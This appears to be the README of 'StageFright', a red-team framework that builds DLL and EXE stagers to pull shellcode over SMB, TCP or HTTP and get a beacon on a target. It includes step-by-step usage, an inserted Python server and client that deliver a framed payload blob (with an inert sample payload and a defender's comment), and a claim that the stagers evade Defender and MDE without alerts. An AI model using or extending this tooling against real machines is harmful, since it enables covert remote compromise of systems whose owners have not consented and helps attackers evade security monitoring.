StageFright is a staged-payload framework that lets the user run customized staged payloads over various protocols. The framework is based on my blog article: https://medium.com/@assume-breach/home-grown-red-team-hosting-encrypted-stager-shellcode-1dc5e06eaeb3
Right now the only protocols in the framework are SMB, TCP and HTTP. I might do FTP, but that seems a little outdated.
At this time the tool produces both DLL and EXE stagers.
This is a replacement for the Shareable tool I uploaded a little while ago. Eventually this tool will be merged into the Harriet tool, but for now this is what I have finished. Watch for updates on Twitter; I will tweet when new features have been added.
How To Use
bash StageFright.sh
Go through the menus and select your stager.
SMB Stager
For SMB, enter the details of the share (shared folder) that is writable.
Upload your shellcode file to that share.
Run the tool.
If you get onto another machine on the network that has access to the share, you can retrieve the shellcode file and get a beacon. I ran the tool on my DC, which has access to the shared folder.
TCP Stager
Go through the script.
You will have to host the TCP server. I have provided a Python script to spin this up; you can find it in StageFright/StageFright/TCP. As of right now the tool does not replace the values in the Python script (it will over the next couple of days), so you will need to set those values by hand.
Run the script to start the TCP server.
Transfer the EXE stager to the target and execute it.
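The TCP stager exchange described above, as an added example that is not StageFright's own TCP server script (the page does not show its wire format): a one-shot server thread hands out a payload blob framed with a length prefix and a SHA-256 checksum, and a client fetches and verifies it. The SF01 framing tag, the 8 MiB size cap and the NOP-sled sample payload are assumptions constructed for this illustration; the real stager would read the shellcode file the operator placed on the server and would decrypt it before use.

```python
"""Minimal TCP stager exchange: server hands out a payload blob, client
fetches and verifies it. Added illustration, not StageFright's TCP script."""
import hashlib
import io
import socket
import struct
import threading
from typing import Callable

# Constructed stand-in for a shellcode file: a NOP sled ending in INT3.
# Purely illustrative; it is never executed here.
SAMPLE_PAYLOAD = b"\x90" * 16 + b"\xcc"

MAGIC = b"SF01"            # assumed framing tag (not StageFright's format)
MAX_PAYLOAD = 8 * 1024 * 1024  # assumed sanity cap on the advertised length
HEADER_LEN = 4 + 4 + 32    # magic | big-endian length | sha256 digest


def frame(payload: bytes) -> bytes:
    """Frame a payload as MAGIC | 4-byte BE length | SHA-256 | payload."""
    return (MAGIC + struct.pack(">I", len(payload))
            + hashlib.sha256(payload).digest() + payload)


def read_exact(read: Callable[[int], bytes], n: int) -> bytes:
    """Read exactly n bytes from a read(n) callable (socket.recv, BytesIO.read)."""
    buf = b""
    while len(buf) < n:
        chunk = read(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the full frame arrived")
        buf += chunk
    return buf


def parse_frame(read: Callable[[int], bytes]) -> bytes:
    """Parse one frame, rejecting bad magic, oversized lengths and checksum mismatches."""
    header = read_exact(read, HEADER_LEN)
    if header[:4] != MAGIC:
        raise ValueError("bad magic")
    (length,) = struct.unpack(">I", header[4:8])
    if length > MAX_PAYLOAD:
        raise ValueError("advertised length exceeds cap")
    digest = header[8:40]
    payload = read_exact(read, length)
    if hashlib.sha256(payload).digest() != digest:
        raise ValueError("checksum mismatch")
    return payload


def parse_bytes(data: bytes) -> bytes:
    """Parse a frame held entirely in memory (handy for offline checks)."""
    return parse_frame(io.BytesIO(data).read)


def serve_once(payload: bytes, host: str = "127.0.0.1", port: int = 0):
    """Serve one framed payload to the first client, on a background thread.
    Returns (bound_port, thread); port 0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(10)
    bound_port = srv.getsockname()[1]

    def handler():
        try:
            conn, _ = srv.accept()
            with conn:
                conn.sendall(frame(payload))
        finally:
            srv.close()

    t = threading.Thread(target=handler, daemon=True)
    t.start()
    return bound_port, t


def fetch(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Client side: connect, pull one frame, return the verified payload."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return parse_frame(s.recv)


def demo() -> bytes:
    """One local round trip: serve SAMPLE_PAYLOAD, fetch it back."""
    port, t = serve_once(SAMPLE_PAYLOAD)
    data = fetch("127.0.0.1", port)
    t.join(timeout=5)
    return data


if __name__ == "__main__":
    print(f"fetched {len(demo())} bytes over loopback")
```

Run it as a script for one loopback round trip, or point fetch() at a real host and port. The checksum only catches corruption or truncation in transit; it does not authenticate the server, so the encryption described in the linked blog post would sit on top of this framing rather than replace it. From the defender's side, note that this is a raw TCP download of a fixed-size blob on an arbitrary port, which is easy to flag and is consistent with the README's statement that no OPSEC considerations have been made yet.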
Everything should work out of the box on Kali, but on Mint/Ubuntu you will need to install MinGW-w64 for compilation. This is the beginning of the project; I am mainly releasing it so I have a base to build on. No OPSEC considerations have been made at this time. Native APIs are used in some cases. Which AV/EDR products this gets past is unknown at this point; it gets past Defender and MDE (P1 trial license) with no alerts.